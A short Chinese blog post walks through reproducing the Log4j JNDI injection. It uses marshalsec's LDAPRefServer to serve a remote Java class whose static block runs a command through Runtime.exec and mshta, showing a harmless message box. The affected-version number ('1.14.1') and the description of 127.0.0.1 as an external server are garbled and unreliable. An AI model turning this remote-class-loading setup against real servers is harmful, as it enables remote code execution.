log4j漏洞,jndi侵入验证复现

log4j的1.14.1往下版本

需要先搭建一个LDAP服务器,git地址

git clone https://github.com/mbechler/marshalsec.git

执行 marshalsec.jndi.LDAPRefServer 的main函数,idea添加执行命令

"http://127.0.0.1/fileService/download/1/1/#test" 8888

 意思是将文件服务器http://127.0.0.1/fileService/download/1/1/下面的test类,映射到8888端口

然后编写test类

public class test {
    static{
        try {
            Runtime.getRuntime().exec("cmd /c mshta vbscript:msgbox(\"有人从你的log4进来了\",64,\"来自熊猫头的消息\")(window.close)");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

test类执行了一个cmd指令,执行了一段vb程序语句

将他编译成class,放到文件服务器上,这里随便搭建什么文件服务器都行,给LDAP用。

我这边是用现有的外网远程服务器,http://127.0.0.1/fileService/download/1/1/

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值